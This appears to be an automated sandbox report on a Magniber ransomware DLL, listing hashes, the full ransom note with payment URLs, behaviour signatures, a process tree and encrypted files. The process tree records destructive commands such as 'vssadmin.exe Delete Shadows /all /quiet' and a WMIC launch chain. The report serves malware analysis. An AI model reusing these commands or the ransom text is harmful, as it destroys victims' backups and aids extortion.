Resubmissions

  • 12-04-2023 09:01  230412-kzbvhsbb72  score 10
  • 25-05-2022 10:14  220525-l9q8madfeq  score 10

Analysis

  • max time kernel
    51s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-05-2022 10:14

General

  • Target

    10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll

  • Size

    21KB

  • MD5

    a60c5212d52fe1488d2f82989a2947d2

  • SHA1

    0a744d6c76902d28eb6687d66c18b0a354f29b9d

  • SHA256

    10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

  • SHA512

    afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score
10/10

Malware Config

Extracted

  • Path
    C:\Users\Admin\Desktop\readme.txt
  • Family
    magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://2e1c34a05218a2003cdihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl
http://2e1c34a05218a2003cdihlxbl.flysex.space/dihlxbl
http://2e1c34a05218a2003cdihlxbl.partscs.site/dihlxbl
http://2e1c34a05218a2003cdihlxbl.codehes.uno/dihlxbl
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

  • http://2e1c34a05218a2003cdihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl
  • http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl
  • http://2e1c34a05218a2003cdihlxbl.flysex.space/dihlxbl
  • http://2e1c34a05218a2003cdihlxbl.partscs.site/dihlxbl
  • http://2e1c34a05218a2003cdihlxbl.codehes.uno/dihlxbl

Signatures

  • Magniber Ransomware
    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
  • Process spawned unexpected child process (8 IoCs)
    This typically indicates the parent process was compromised via an exploit or macro.
  • Deletes shadow copies (2 TTPs)
    Ransomware often targets backup files to inhibit system recovery.
  • Modifies extensions of user files (6 IoCs)
    Ransomware generally changes the extension on encrypted files.
  • Suspicious use of SetThreadContext (3 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Interacts with shadow copies (2 TTPs, 4 IoCs)
    Shadow copies are often targeted by ransomware to inhibit system recovery.
  • Modifies Internet Explorer settings (1 TTP, 31 IoCs)
  • Modifies registry class (11 IoCs)
  • Opens file in notepad (likely ransom note) (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious behavior: MapViewOfSection (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of FindShellTrayWindow (4 IoCs)
  • Suspicious use of SendNotifyMessage (2 IoCs)
  • Suspicious use of SetWindowsHookEx (6 IoCs)
  • Suspicious use of UnmapMainImage (2 IoCs)
  • Suspicious use of WriteProcessMemory (61 IoCs)

Processes

(Indentation follows the depth marker N⤵ of each entry: a depth-2 entry is a child of the nearest depth-1 entry above it, and so on.)

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1372
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:288
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1652
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1060
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      • Suspicious use of FindShellTrayWindow
      PID:1336
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl^&1^&43399969^&80^&367^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl&1&43399969&80&367&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1640 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1208
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1228
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:936
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1388
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1708
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1624
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1144
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:772
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:892
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2020
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1464
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:836
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1728
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:1712

Downloads

  • C:\Users\Admin\Desktop\ClearInstall.vb.dihlxbl
    Filesize 699KB
    MD5 15eafb1e225a625f0fe2cd4a0f1c1731
    SHA1 a51d17ac2313d3cda9bdb33aec02389dcf9e3039
    SHA256 6906189cb96ee3dfe29d2d454f49362222947f970b6dbeedf1bf0acee18f2267
    SHA512 dfd191963ba6d06a75f64987136b998979545a46e84e520e00b2a4dbb131c71570f9ad2a5e552f9895404f38ba499ed5ce62ac2083fddff1503005a8ef79caff
  • C:\Users\Admin\Desktop\CompressBackup.zip.dihlxbl
    Filesize 745KB
    MD5 0a4b5e1b3b074c1feaab061d9f99e4fd
    SHA1 00de65d207b5cd66c41a09ed7587f8bc6076dacd
    SHA256 8785ff5f52f273ad81313ea70ed4e55eda4e4b1c162865f1d04370e0da1b73de
    SHA512 ec8dac75478991fb11c3c763b32fb9b52db16a3d6a769581aaa45938bade476c518ce1045ccd9fc59b8502c1e186b0fd1da3e624377d86bc313f61c98c46599c
  • C:\Users\Admin\Desktop\ConnectSet.zip.dihlxbl
    Filesize 653KB
    MD5 5ca510fc00151f2fb22de87f297459c1
    SHA1 e871186a10f7b2010a366141af9dedaaee093aaa
    SHA256 9f4bb40486a45c3e15d1012d829a16a8c1d31c81a6648e71dcd31beec84e0ab4
    SHA512 f03e93095ad761f071a5c1923d9efb7371bd7ff32f56bf3dc243f1416eeb8de932150e3ad568ff8c6b8315f7b722b80ed242301a0476a8e85be6c09fde48b077
  • C:\Users\Admin\Desktop\EnableStep.dib.dihlxbl
    Filesize 332KB
    MD5 dfddbe4f7b2ac4df3957bff71327b39a
    SHA1 7f97bc69591bb4e40a78b61046b42deef9b21005
    SHA256 82bcc596cb40fd52c1626ac18576992fe13055b5964ca43d40178d72945b066b
    SHA512 9cea42fadf2762bb6571bc7c5a3783084dc02b482cdc58079f8ef8fcb6381aacea18b4692d9806eb1bd21c7cb20f1886ecd045f65644d3317183b1283f10a79b
  • C:\Users\Admin\Desktop\FindResolve.docx.dihlxbl
    Filesize 470KB
    MD5 5a8e5fa48ab11b150668f5e964e627cd
    SHA1 6996c07ff49d2eddbb39c011e622bf7064bd6a2c
    SHA256 130aaf5fc25964c4a35f58a514f2bb4861ca783416ce24c87f4137151620aafe
    SHA512 5060f975096bae2f32f0dfaf66298eff6a898b0a081a20f673bc9bfe539f10eae129de1245f58e8746f383ecb34600efaeb85c953031e3cbdd837f77ef767abd
  • C:\Users\Admin\Desktop\GroupStop.rar.dihlxbl
    Filesize 401KB
    MD5 85be5d46416bc6a2333716af1199f826
    SHA1 0ef54d0650baaecfaa1d09582959f78a73cd6daf
    SHA256 226a8653b81055eda6674f59d13af9146e5d58f33a565cdd6be050858be985be
    SHA512 76ecfdbbfa81450735f5a9c7fb21a0dcf2bdadc0eda9d4b0f2b105d4b14621e7b4ee0e2f8ea2c634b6a8093cdab0ae5e622bb285cb5b13dc5f43f7f224ea70fe
  • C:\Users\Admin\Desktop\HideClose.bmp.dihlxbl
    Filesize 608KB
    MD5 ec699968fc37a73fc08c9cfe6b6e2d02
    SHA1 371254f7df7dbd2589c5770bb31f891db922cd5d
    SHA256 d7c6dd1ca5f892bfa4a3708ffffe7d4e60f742108a4ae057d41ed428de07ec07
    SHA512 69aee0784a9736028822066336f721ca739220d8b879462582b08c3761e969ec8a7fa4376a528800519fc42e09bd57ac5fcff459886b1b04451bb1ec74ceb175
  • C:\Users\Admin\Desktop\MergeExpand.php.dihlxbl
    Filesize 493KB
    MD5 d1a04685dae3c94f0700920e4cf7b807
    SHA1 869151ec55a59cc16610f8fe36c6f9b1f2c83e21
    SHA256 17aeb6b9db987db748ff45fdb2333a0dcff6b60e4fb9e3d08f5357d728df7522
    SHA512 b0e72a32c10b1dec15468a704227fce7a2288e3cdc47194504a3db67775425d47ce7c358cd30bd5eb15e3acf4f9fc36c2fce9f811c90629d01317e9f25078163
  • C:\Users\Admin\Desktop\MountReceive.jtx.dihlxbl
    Filesize 791KB
    MD5 fa72f285d313ce194ad4f2783177ba78
    SHA1 0b0d7d1ee25c547d9f6fa05f7e805cae7ddf2436
    SHA256 140a4648834a9781b0882d9d98caa498c59f7357ff48fe42b27bd4afa4abfb4f
    SHA512 7e43215c6c8bab2ec61899f2e7c0aefa4c20775b74c82e202776375a250e4d5275f6f4f3c9846695e2a77d10be3a39ddcdbef1b46fe2784d80cc1fc6fe4fb42b
  • C:\Users\Admin\Desktop\RedoOut.xps.dihlxbl
    Filesize 676KB
    MD5 1610290ec938cb94ce44d45870079d66
    SHA1 a4f4e3740177e140b43e1518b2f710dbdabfdd0d
    SHA256 b61c6a9988a7404932b2c42d57b23ac10f70ccceb83a9346314794ec8579e520
    SHA512 ba6e1ddcf1915b84516bb842a984d24851c48d0888d98d7c6dd886a4ed6b9f813b8124dcc0b4bb45dc9b6ef004eee562c6363137288279efbfe82f7e1857f408
  • C:\Users\Admin\Desktop\RequestGet.vstm.dihlxbl
    Filesize 309KB
    MD5 e3cde3ab202f005105b88fdcf77d855f
    SHA1 95acdc22c15b3268a20deaa86dfae95dfe7885df
    SHA256 5c342e6de5a7a243c6b72c494e4ad9b65503d7ac3c2d9b7472fe5ec2fdde47de
    SHA512 0499e131734e8ce2cdb86241ec96ca9019df2833f2241501a7f8bd0e5177e3136fb12c8c09777bd7725d40473261e4ad753df44cfe3dc62a18c90b32599e091d
  • C:\Users\Admin\Desktop\RequestWatch.php.dihlxbl
    Filesize 631KB
    MD5 1c29fef5fb6708e3e506947186c47fc7
    SHA1 073a3ef45169379b35bac00546657d8e1db2c5de
    SHA256 cca14aa5fbd0ad882922141b2dda048d8d08bda18e3cb7d0f1b02ece9b69a0a0
    SHA512 7fbf42f56b2603ff235aa9e3483321ed665bb30cd629898a8eddeaef7acc62456b141e7d982e52d9c09486bf7289c7633339b6c8965d2134e351c423a00e54f7
  • C:\Users\Admin\Desktop\UnpublishConvertTo.mpeg.dihlxbl
    Filesize 722KB
    MD5 6473a20841004a360af8265f7f32a608
    SHA1 346f278730a8c2622a66824dcb03324b66d61d7d
    SHA256 fa488cefb17a7cc6232d7f880a3265ece5fcb772724c63d30aac1755859db6f2
    SHA512 1ac25c89e8fac9acd583b2c4103d9f00905104c65d72dd6f6abbde368e92efe0ed0d9b7fbf3bb510986bff7e3041e611da4323c73ee97908736cd4977a76ebc8
  • C:\Users\Admin\Desktop\readme.txt
    Filesize 1KB
    MD5 3b155ef540764cc6c90eaa66357dbef3
    SHA1 ebe2d8e8e158caa4ff1123ed46f5d719a9f53352
    SHA256 a24dc483f6b7a2963517b5c1d3ef0aa247d0f0fc4347e1d7f0cff98c85e4f806
    SHA512 32fe012d348f2deafdf6d56ff1106fa1e886d8c9f6065173a8005261aa58e6a2709686d3170ccac0cb6671cb4bf018f7b7a78e067a70e812335d2e34667f65ed
  • C:\Users\Public\readme.txt
    Filesize 1KB
    MD5 3b155ef540764cc6c90eaa66357dbef3
    SHA1 ebe2d8e8e158caa4ff1123ed46f5d719a9f53352
    SHA256 a24dc483f6b7a2963517b5c1d3ef0aa247d0f0fc4347e1d7f0cff98c85e4f806
    SHA512 32fe012d348f2deafdf6d56ff1106fa1e886d8c9f6065173a8005261aa58e6a2709686d3170ccac0cb6671cb4bf018f7b7a78e067a70e812335d2e34667f65ed
